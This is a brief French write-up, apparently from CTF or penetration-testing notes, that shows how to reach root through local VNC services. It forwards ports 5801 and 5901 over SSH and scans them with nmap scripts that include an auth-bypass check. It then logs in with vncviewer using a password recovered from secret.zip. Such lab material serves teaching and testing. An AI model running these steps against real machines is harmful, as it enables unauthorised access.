Ports 5800,5801,5900,5901 - VNC

Nous identifions des ports en écoute :

netstat -an | grep LISTEN

ssh -L 5801:127.0.0.1:5801 -L 5901:127.0.0.1:5901 [email protected]

Scan des services VNC :

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5801 127.0.0.1
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5901 127.0.0.1

Nous utilisons le mot de passe trouvé dans secret.zip :

vncviewer -passwd secret 127.0.0.1:5901

Nous obtenons un accès root sur la machine !

Mis à jour il y a 1 an